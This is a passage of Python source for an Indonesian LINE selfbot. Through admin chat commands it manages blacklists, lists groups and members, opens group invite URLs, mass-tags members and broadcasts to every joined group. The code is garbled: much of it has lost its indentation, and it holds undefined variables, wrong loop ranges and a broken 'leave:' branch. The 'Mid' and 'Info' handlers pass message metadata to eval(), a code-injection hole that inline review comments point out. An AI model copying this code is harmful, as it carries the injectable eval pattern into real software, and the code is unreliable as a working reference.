aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan admin")
#===========KARA LİSTE EKLE============#
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
aditmadzs.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
aditmadzs.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#===========TALKBAN============#
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
aditmadzs.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
aditmadzs.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#===========FOTOĞRAF GÜNCELLEME============#
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = aditmadzs.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
aditmadzs.sendMessage(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = aditmadzs.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
aditmadzs.updateGroupPicture(msg.to, path)
aditmadzs.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ADITMADZSfoto"]:
path = aditmadzs.downloadObjectMsg(msg_id)
del Setmain["ADITMADZSfoto"][mid]
aditmadzs.updateProfilePicture(path)
aditmadzs.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ADITMADZSfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ADITMADZSfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
aditmadzs.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
aditmadzs.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
aditmadzs.sendMessage(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
aditmadzs.sendMessage(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help bot":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
aditmadzs.sendMessage(msg.to, str(helpMessage1))
elif cmd == "meme":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage2 = infomeme()
aditmadzs.sendMessage(msg.to, str(helpMessage2))
elif cmd == "translate":
if wait["selfbot"] == True:
if msg._from in admin:
helpTranslate = translate()
aditmadzs.sendMessage(msg.to, str(helpTranslate))
if cmd == "unsend on":
if msg._from in admin:
wait["unsend"] = True
aditmadzs.sendMessage(msg.to, "Deteksi Unsend Diaktifkan")
if cmd == "unsend off":
if msg._from in admin:
wait["unsend"] = False
aditmadzs.sendMessage(msg.to, "Deteksi Unsend Dinonaktifkan")
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = " ┏━━━━━━━━━━━━━━━━━\n┃┃SEAL TEAM \n┃┣━━━━━━━━━━━━━━━━━━━━\n"
if wait["unsend"] == True: md+="┃┃🍁 ✔️ Unsend「ON」\n"
else: md+="┃┃🍁 ✖ Unsend「OFF」\n"
if wait["sticker"] == True: md+="┃┃🍁 ✔️ Sticker「ON」\n"
else: md+="┃┃🍁 ✖ Sticker「OFF」\n"
if wait["contact"] == True: md+="┃┃🍁 ✔️ Contact「ON」\n"
else: md+="┃┃🍁 ✖ Contact「OFF」\n"
if wait["talkban"] == True: md+="┃┃🍁 ✔️ Talkban「ON」\n"
else: md+="┃┃🍁 ✖ Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="┃┃🍁 ✔️ Notag「ON」\n"
else: md+="┃┃🍁 ✖ Notag「OFF」\n"
if wait["detectMention"] == True: md+="┃┃🍁 ✔️ Respon「ON」\n"
else: md+="┃┃🍁 ✖ Respon「OFF」\n"
if wait["Mentiongift"] == True: md+="┃┃🍁 ✔️ Respongift「ON」\n"
else: md+="┃┃🍁 ✖ Respongift「OFF」\n"
if wait["autoJoin"] == True: md+="┃┃🍁 ✔️ Autojoin「ON」\n"
else: md+="┃┃🍁 ✖ Autojoin「OFF」\n"
if settings["autoJoinTicket"] == True: md+="┃┃🍁 ✔️ Jointicket「ON」\n"
else: md+="┃┃🍁 ✖ Jointicket「OFF」\n"
if wait["autoAdd"] == True: md+="┃┃🍁 ✔️ Autoadd「ON」\n"
else: md+="┃┃🍁 ✖ Autoadd「OFF」\n"
if msg.to in welcome: md+="┃┃🍁 ✔️ Welcome「ON」\n"
else: md+="┃┃🍁 ✖ Welcome「OFF」\n"
if msg.to in simisimi: md+="┃┃🍁 ✔️ Simisimi「ON」\n"
else: md+="┃┃🍁 ✖ Simisimi「OFF」\n"
if wait["autoLeave"] == True: md+="┃┃🍁 ✔️ Autoleave「ON」\n"
else: md+="┃┃🍁 ✖ Autoleave「OFF」\n"
if msg.to in protectqr: md+="┃┃🍁 ✔️ Protecturl「ON」\n"
else: md+="┃┃🍁 ✖ Protecturl「OFF」\n"
if msg.to in protectjoin: md+="┃┃🍁 ✔️ Protectjoin「ON」\n"
else: md+="┃┃🍁 ✖ Protectjoin「OFF」\n"
if msg.to in protectkick: md+="┃┃🍁 ✔️ Protectkick「ON」\n"
else: md+="┃┃🍁 ✖ Protectkick「OFF」\n"
if msg.to in protectcancel: md+="┃┃🍁 ✔️ Protectcancel「ON」\n"
else: md+="┃┃🍁 ✖ Protectcancel「OFF」\n"
if msg.to in protectinvite: md+="┃┃🍁 ✔️ Protectinvite「ON」\n"
else: md+="┃┃🍁 ✖ Protectinvite「OFF」\n"
aditmadzs.sendMessage(msg.to, md+"┃┣━━━━━━━━━━━━━━━━━━━━\n┃┃❧ Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\n┃┃❧ Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n ┗━━━━━━━━━━━━━━━━━")
elif cmd == "status translate":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = " ┏━━━━━━━━━━━━━━━━━\n┃┃ SEAL TEAM \n┃┣━━━━━━━━━━━━━━━━━━━━\n"
if msg.to in translateen: md+="┃┃🍁 ✔️ English「ON」\n"
else: md+="┃┃🍁 ✖ English「OFF」\n"
if msg.to in translateid: md+="┃┃🍁 ✔️ Indonesia「ON」\n"
else: md+="┃┃🍁 ✖ Indonesia「OFF」\n"
if msg.to in translateth: md+="┃┃🍁 ✔️ Thailand「ON」\n"
else: md+="┃┃🍁 ✖ Thailand「OFF」\n"
if msg.to in translatetw: md+="┃┃🍁 ✔️ Taiwan「ON」\n"
else: md+="┃┃🍁 ✖ Taiwan「OFF」\n"
if msg.to in translatear: md+="┃┃🍁 ✔️ Arab「ON」\n"
else: md+="┃┃🍁 ✖ Arab「OFF」\n"
aditmadzs.sendMessage(msg.to, md+"┃┣━━━━━━━━━━━━━━━━━━━━\n┃┃❧ Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\n┃┃❧ Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n ┗━━━━━━━━━━━━━━━━━")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
aditmadzs.sendMessage(msg.to,"Creator Bot")
ma = ""
for i in creator:
ma = aditmadzs.getContact(i)
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Aditmadzs SelfBOT 1 Assist 」\n")
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg._from}
aditmadzs.sendMessage1(msg)
elif text.lower() == "mymid":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, msg._from)
        elif ("Mid " in msg.text):
            # Look up the first mentioned user and reply with name + mid.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    # SECURITY(review): eval() on message metadata executes
                    # attacker-controllable text — json.loads would be safer.
                    key = eval(msg.contentMetadata["MENTION"])
                    key1 = key["MENTIONEES"][0]["M"]
                    mi = aditmadzs.getContact(key1)
                    aditmadzs.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
                    aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
        elif ("Info " in msg.text):
            # Like "Mid" but also sends status message and profile picture /
            # profile video of the first mentioned user.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    # SECURITY(review): eval() on message metadata — see above.
                    key = eval(msg.contentMetadata["MENTION"])
                    key1 = key["MENTIONEES"][0]["M"]
                    mi = aditmadzs.getContact(key1)
                    aditmadzs.sendMessage(msg.to, "❧ Nama : "+str(mi.displayName)+"\n🐚 Mid : " +key1+"\n🐚 Status : "+str(mi.statusMessage))
                    aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
                    # A contact with a profile video embeds videoProfile='{...}'
                    # in its repr; in that case fetch the small video variant.
                    if "videoProfile='{" in str(aditmadzs.getContact(key1)):
                        aditmadzs.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
                    else:
                        aditmadzs.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
        elif cmd == "mybot":
            # Send both the main bot's and the assist bot's contact cards.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    msg.contentType = 13
                    msg.contentMetadata = {'mid': mid}
                    aditmadzs.sendMessage1(msg)
                    msg.contentType = 13
                    msg.contentMetadata = {'mid': Amid}
                    aditmadzs.sendMessage1(msg)
        elif text.lower() == "hapus chat":
            # "delete chat": clear the main bot's message history for this
            # chat; failures are deliberately ignored (best effort).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    try:
                        aditmadzs.removeAllMessages(op.param2)
                    except:
                        pass
        elif text.lower() == "remove chat":
            # Same, but clears the assist bot's (ki) history and confirms.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    try:
                        ki.removeAllMessages(op.param2)
                        aditmadzs.sendMessage(msg.to,"Chat dibersihkan...")
                    except:
                        pass
        elif cmd.startswith("broadcast: "):
            # Send the text after "broadcast: " to every group the bot is in.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    sep = text.split(" ")
                    pesan = text.replace(sep[0] + " ","")
                    saya = aditmadzs.getGroupIdsJoined()
                    for group in saya:
                        aditmadzs.sendMessage(group,"=======[BROADCAST]=======\n\n"+pesan+"\n\nCreator : line.me/ti/p/~adit_cmct")
        elif text.lower() == "mykey":
            # Show the current command-prefix key.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    aditmadzs.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
        elif cmd.startswith("setkey "):
            # Change the command-prefix key (stored lower-cased).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    sep = text.split(" ")
                    key = text.replace(sep[0] + " ","")
                    # Reject empty / whitespace-only keys.
                    if key in [""," ","\n",None]:
                        aditmadzs.sendMessage(msg.to, "Gagal mengganti key")
                    else:
                        Setmain["keyCommand"] = str(key).lower()
                        aditmadzs.sendMessage(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
        elif text.lower() == "resetkey":
            # Clear the command-prefix key back to none.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    Setmain["keyCommand"] = ""
                    aditmadzs.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
        elif cmd == "restart":
            # Creator-only: remember the chat to report back to, then restart.
            if wait["selfbot"] == True:
                if msg._from in creator:
                    aditmadzs.sendMessage(msg.to, "Restart Sukses Bos!...")
                    Setmain["restartPoint"] = msg.to
                    restartBot()
        elif cmd == "runtime":
            # Report how long the bot has been running (since `mulai`).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    eltime = time.time() - mulai
                    bot = "Aktif " +waktu(eltime)
                    aditmadzs.sendMessage(msg.to,bot)
        elif cmd == "ginfo":
            # Summarise the current group: creator, pending invites, QR/ticket
            # state, member count, creation time, picture.
            if msg._from in admin:
                try:
                    G = aditmadzs.getGroup(msg.to)
                    if G.invitee is None:
                        gPending = "0"
                    else:
                        gPending = str(len(G.invitee))
                    if G.preventedJoinByTicket == True:
                        gQr = "Tertutup"
                        gTicket = "Tidak ada"
                    else:
                        gQr = "Terbuka"
                        gTicket = "https://line.me/R/ti/g/{}".format(str(aditmadzs.reissueGroupTicket(G.id)))
                    # createdTime is in milliseconds since the epoch.
                    timeCreated = []
                    timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
                    aditmadzs.sendMessage(msg.to, "❧ BOT Grup Info\n\n ❧ Nama Group : {}".format(G.name)+ "\n🐚 ID Group : {}".format(G.id)+ "\n🐚 Pembuat : {}".format(G.creator.displayName)+ "\n🐚 Waktu Dibuat : {}".format(str(timeCreated))+ "\n🐚 Jumlah Member : {}".format(str(len(G.members)))+ "\n🐚 Jumlah Pending : {}".format(gPending)+ "\n🐚 Group Qr : {}".format(gQr)+ "\n🐚 Group Ticket : {}".format(gTicket))
                    aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
                    aditmadzs.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
                except Exception as e:
                    aditmadzs.sendMessage(msg.to, str(e))
        elif cmd.startswith("infogrup "):
            # Show details for the N-th joined group (1-based index argument).
            if msg._from in admin:
                separate = text.split(" ")
                number = text.replace(separate[0] + " ","")
                groups = aditmadzs.getGroupIdsJoined()
                ret_ = ""
                try:
                    group = groups[int(number)-1]
                    G = aditmadzs.getGroup(group)
                    try:
                        gCreator = G.creator.displayName
                    except:
                        gCreator = "Tidak ditemukan"
                    if G.invitee is None:
                        gPending = "0"
                    else:
                        gPending = str(len(G.invitee))
                    if G.preventedJoinByTicket == True:
                        gQr = "Tertutup"
                        gTicket = "Tidak ada"
                    else:
                        gQr = "Terbuka"
                        gTicket = "https://line.me/R/ti/g/{}".format(str(aditmadzs.reissueGroupTicket(G.id)))
                    # createdTime is in milliseconds since the epoch.
                    timeCreated = []
                    timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
                    ret_ += "⏩ BOT Grup Info\n"
                    ret_ += "\n⏩ Name : {}".format(G.name)
                    ret_ += "\n⏩ ID : {}".format(G.id)
                    ret_ += "\n⏩ Creator : {}".format(gCreator)
                    ret_ += "\n⏩ Created Time : {}".format(str(timeCreated))
                    ret_ += "\n⏩ Member : {}".format(str(len(G.members)))
                    ret_ += "\n⏩ Pending : {}".format(gPending)
                    ret_ += "\n⏩ Qr : {}".format(gQr)
                    ret_ += "\n⏩ Ticket : {}".format(gTicket)
                    ret_ += ""
                    # `to` is presumably the reply target set earlier in the
                    # handler (other branches use msg.to) — TODO confirm.
                    aditmadzs.sendMessage(to, str(ret_))
                except:
                    pass
        elif cmd.startswith("infomem "):
            # List the members of the N-th joined group.
            if msg._from in admin:
                separate = msg.text.split(" ")
                number = msg.text.replace(separate[0] + " ","")
                groups = aditmadzs.getGroupIdsJoined()
                ret_ = ""
                try:
                    group = groups[int(number)-1]
                    G = aditmadzs.getGroup(group)
                    no = 0
                    ret_ = ""
                    for mem in G.members:
                        no += 1
                        ret_ += "\n " "⏩ "+ str(no) + ". " + mem.displayName
                    aditmadzs.sendMessage(to,"⏩ Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
                except:
                    pass
        elif cmd.startswith("leave: "):
            # Make the assist bot (ki) leave the N-th joined group.
            if msg._from in admin:
                separate = msg.text.split(" ")
                number = msg.text.replace(separate[0] + " ","")
                groups = aditmadzs.getGroupIdsJoined()
                group = groups[int(number)-1]
                # NOTE(review): `group` is a single group-id string, so this
                # loop iterates its characters, and `ginfo == group` compares a
                # Group object to a string (never equal) — this branch looks
                # broken as written; verify intent before relying on it.
                for i in group:
                    ginfo = aditmadzs.getGroup(i)
                    if ginfo == group:
                        ki.leaveGroup(i)
                        aditmadzs.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
        elif cmd == "fiendlist":
            # List all contacts of the main bot.
            # NOTE(review): command is spelled "fiendlist" (likely a typo for
            # "friendlist"); changing it would break existing users' muscle
            # memory, so it is only flagged here.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ma = ""
                    a = 0
                    gid = aditmadzs.getAllContactIds()
                    for i in gid:
                        G = aditmadzs.getContact(i)
                        a = a + 1
                        end = "\n"
                        ma += "┃┃ " + str(a) + ". " +G.displayName+ "\n"
                    aditmadzs.sendMessage(msg.to,"┏━━[ FRIEND LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Friends ]")
        elif cmd == "gruplist":
            # List all groups the main bot has joined.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ma = ""
                    a = 0
                    gid = aditmadzs.getGroupIdsJoined()
                    for i in gid:
                        G = aditmadzs.getGroup(i)
                        a = a + 1
                        end = "\n"
                        ma += "┃┃ " + str(a) + ". " +G.name+ "\n"
                    aditmadzs.sendMessage(msg.to,"┏━━[ GROUP LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Groups ]")
        elif cmd == "gruplist1":
            # Same listing but for the assist bot (ki).
            if msg._from in admin:
                ma = ""
                a = 0
                gid = ki.getGroupIdsJoined()
                for i in gid:
                    G = ki.getGroup(i)
                    a = a + 1
                    end = "\n"
                    ma += "┃┃ " + str(a) + ". " +G.name+ "\n"
                ki.sendMessage(msg.to,"┏━━[ GROUP LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Groups ]")
        elif cmd == "open":
            # Open the group's join-by-ticket URL (toType 2 = group chat).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        X = ki.getGroup(msg.to)
                        X.preventedJoinByTicket = False
                        ki.updateGroup(X)
                        ki.sendMessage(msg.to, "Url Opened")
        elif cmd == "close":
            # Close the group's join-by-ticket URL.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        X = ki.getGroup(msg.to)
                        X.preventedJoinByTicket = True
                        ki.updateGroup(X)
                        ki.sendMessage(msg.to, "Url Closed")
        elif cmd == "url grup":
            # Reply with the group's invite URL, opening the ticket first if
            # it is currently closed (and leaving it open afterwards).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        x = ki.getGroup(msg.to)
                        if x.preventedJoinByTicket == True:
                            x.preventedJoinByTicket = False
                            ki.updateGroup(x)
                        gurl = ki.reissueGroupTicket(msg.to)
                        ki.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
        elif cmd == "reject":
            # Creator-only: decline every pending group invitation.
            if wait["selfbot"] == True:
                if msg._from in creator:
                    ginvited = aditmadzs.getGroupIdsInvited()
                    if ginvited != [] and ginvited != None:
                        for gid in ginvited:
                            aditmadzs.rejectGroupInvitation(gid)
                        aditmadzs.sendMessage(to, "Berhasil tolak sebanyak {} undangan grup".format(str(len(ginvited))))
                    else:
                        aditmadzs.sendMessage(to, "Tidak ada undangan yang tertunda")
        #===========BOT UPDATE============#
        elif cmd == "updategrup":
            # Arm the "next image updates the group picture" flag; the actual
            # upload is handled elsewhere when the photo arrives.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        settings["groupPicture"] = True
                        aditmadzs.sendMessage(msg.to,"Kirim fotonya.....")
        elif cmd == "updatebot":
            # Arm the "next image updates the bot's profile picture" flag.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    settings["changePicture"] = True
                    ki.sendMessage(msg.to,"Kirim fotonya.....")
        elif cmd == "updatefoto":
            # Arm per-account photo update for the main bot (mid).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    Setmain["ADITMADZSfoto"][mid] = True
                    aditmadzs.sendMessage(msg.to,"Kirim fotonya.....")
        elif cmd == "bot1up":
            # Arm per-account photo update for the assist bot (Amid).
            if msg._from in admin:
                Setmain["ADITMADZSfoto"][Amid] = True
                ki.sendMessage(msg.to,"Kirim fotonya.....")
        elif cmd.startswith("myname: "):
            # Rename the main bot's display name.
            if msg._from in admin:
                separate = msg.text.split(" ")
                string = msg.text.replace(separate[0] + " ","")
                # NOTE(review): 10000000000 is effectively no length limit;
                # LINE itself caps display names much lower.
                if len(string) <= 10000000000:
                    profile = aditmadzs.getProfile()
                    profile.displayName = string
                    aditmadzs.updateProfile(profile)
                    aditmadzs.sendMessage(msg.to,"Nama diganti jadi " + string + "")
        elif cmd.startswith("bot1name: "):
            # Rename the assist bot's display name.
            if msg._from in admin:
                separate = msg.text.split(" ")
                string = msg.text.replace(separate[0] + " ","")
                if len(string) <= 10000000000:
                    profile = ki.getProfile()
                    profile.displayName = string
                    ki.updateProfile(profile)
                    ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
        #===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == '😆':
if wait["selfbot"] == True:
group = aditmadzs.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 20:
mentionMembers(msg.to, nama)
if jml > 20 and jml < 40:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 40 and jml < 60:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 60 and jml < 80:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 60):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (80, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 80 and jml < 100:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 60):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 80):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm4)
        elif cmd == "listbot":
            # Enumerate the bot accounts in `Bots` by display name.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ma = ""
                    a = 0
                    for m_id in Bots:
                        a = a + 1
                        end = '\n'
                        ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
                    aditmadzs.sendMessage(msg.to,"⏩ BOT\n\n"+ma+"\nTotal「%s」BOT" %(str(len(Bots))))
        elif cmd == "listadmin":
            # Enumerate owners, admins and staff by display name.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ma = ""
                    mb = ""
                    mc = ""
                    a = 0
                    b = 0
                    c = 0
                    for m_id in owner:
                        a = a + 1
                        end = '\n'
                        ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
                    for m_id in admin:
                        b = b + 1
                        end = '\n'
                        mb += str(b) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
                    for m_id in staff:
                        c = c + 1
                        end = '\n'
                        mc += str(c) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
                    aditmadzs.sendMessage(msg.to,"⏩ Admin Aditmadzs BOT\n\n⏩Creator BOT:\n"+ma+"\n⏩Admin:\n"+mb+"\n⏩Staff:\n"+mc+"\n⏩Total「%s」" %(str(len(owner)+len(admin)+len(staff))))
        elif cmd == "listprotect":
            # Enumerate the groups present in each protection set
            # (qr / kick / join / cancel / invite).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ma = ""
                    mb = ""
                    mc = ""
                    md = ""
                    me = ""
                    a = 0
                    b = 0
                    c = 0
                    d = 0
                    e = 0
                    gid = protectqr
                    for group in gid:
                        a = a + 1
                        end = '\n'
                        ma += str(a) + ". " +aditmadzs.getGroup(group).name + "\n"
                    gid = protectkick
                    for group in gid:
                        b = b + 1
                        end = '\n'
                        mb += str(b) + ". " +aditmadzs.getGroup(group).name + "\n"
                    gid = protectjoin
                    for group in gid:
                        d = d + 1
                        end = '\n'
                        md += str(d) + ". " +aditmadzs.getGroup(group).name + "\n"
                    gid = protectcancel
                    for group in gid:
                        c = c + 1
                        end = '\n'
                        mc += str(c) + ". " +aditmadzs.getGroup(group).name + "\n"
                    gid = protectinvite
                    for group in gid:
                        e = e + 1
                        end = '\n'
                        me += str(e) + ". " +aditmadzs.getGroup(group).name + "\n"
                    aditmadzs.sendMessage(msg.to,"⏩ BOT Protection\n\n⏩ PROTECT URL :\n"+ma+"\n⏩ PROTECT KICK :\n"+mb+"\n⏩ PROTECT JOIN :\n"+md+"\n⏩ PROTECT CANCEL:\n"+mc+"\n⏩ PROTECT INVITE :\n"+me+"\nTotal「%s」Protect yang aktif" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite))))
        elif cmd == "respon":
            # Ping the assist bot; it replies with its response string.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    ki.sendMessage(msg.to,responsename1)
        elif cmd == "assist join":
            # Invite the assist bot (Amid) to this group and have it accept;
            # failures are ignored (e.g. already a member).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    try:
                        anggota = [Amid]
                        aditmadzs.inviteIntoGroup(msg.to, anggota)
                        ki.acceptGroupInvitation(msg.to)
                    except:
                        pass
elif cmd == "join dit":
if wait["selfbot"] == True:
if msg._from in admin:
G = aditmadzs.getGroup(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
G.preventedJoinByTicket = False
aditmadzs.updateGroup(G)
invsend = 0
Ticket = aditmadzs.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = gg.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
        elif cmd == "bye":
            # Assist bot says goodbye and leaves the current group.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    G = aditmadzs.getGroup(msg.to)
                    ki.sendMessage(msg.to, "Bye bye group "+str(G.name))
                    ki.leaveGroup(msg.to)
        elif cmd.startswith("leave "):
            # Make the assist bot leave every joined group whose name matches
            # the argument exactly.
            if msg._from in admin:
                proses = text.split(" ")
                ng = text.replace(proses[0] + " ","")
                gid = aditmadzs.getGroupIdsJoined()
                for i in gid:
                    h = aditmadzs.getGroup(i).name
                    if h == ng:
                        ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
                        ki.leaveGroup(i)
                        aditmadzs.sendMessage(to,"Berhasil keluar dari grup " +h)
        elif cmd == "assist1":
            # Open the group URL, pull the assist bot in via ticket, close it.
            if msg._from in admin:
                G = aditmadzs.getGroup(msg.to)
                ginfo = aditmadzs.getGroup(msg.to)
                G.preventedJoinByTicket = False
                aditmadzs.updateGroup(G)
                invsend = 0
                Ticket = aditmadzs.reissueGroupTicket(msg.to)
                ki.acceptGroupInvitationByTicket(msg.to,Ticket)
